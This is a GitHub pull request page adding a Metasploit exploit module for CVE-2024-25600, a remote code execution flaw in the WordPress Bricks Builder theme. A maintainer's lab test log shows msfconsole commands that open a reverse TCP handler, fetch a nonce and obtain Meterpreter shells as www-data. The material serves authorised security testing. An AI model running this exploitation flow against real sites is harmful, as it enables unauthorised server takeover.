-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add wp_bricks_builder_rce (CVE-2024-25600) #18891
Conversation
Hello, I wanted to know about the "Sanity Test Execution", since the changes in my code, it no longer validates this test. I would like some help on this, thank you. EDIT: Just a bug |
b12490c
to
45ae984
Compare
4a861e9
to
45ae984
Compare
I think the change seems pretty legit, thanks! 👍 I think |
Hello @jheysel-r7 Any news about the module? Thanks 🙂 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the great module @Chocapikk! I've left a couple minor suggestions. Testing was as expected:
ARCH_PHP
msf6 exploit(multi/http/wp_bricks_builder_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8000
rport => 8000
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (39927 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56073) at 2024-03-26 12:05:11 -0700
[*] Sending stage (39927 bytes) to 172.16.199.72
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 29292f368fe3
OS : Linux 29292f368fe3 6.6.16-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Feb 16 11:55:08 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >exit
ARCH_CMD
msf6 exploit(multi/http/wp_bricks_builder_rce) > set target 2
target => 2
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:8000
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 3 opened (172.16.199.1:8000 -> 172.16.199.1:56169) at 2024-03-26 12:08:17 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.22.0.3
OS : Debian 12.5 (Linux 6.6.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Co-authored-by: jheysel-r7 <[email protected]>
Co-authored-by: jheysel-r7 <[email protected]>
Co-authored-by: jheysel-r7 <[email protected]>
Co-authored-by: jheysel-r7 <[email protected]>
Hello @jheysel-r7 , I don't think I need to make any changes except to add your suggestions and fix the typos, tested on my lab and it's good too. Thanks for the changes and the explanations as well ! |
abb2eb7
Release NotesThis PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6. |
This pull request introduces the
wp_bricks_builder_rce
exploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness.Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.
I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.
Best regards,
Chocapikk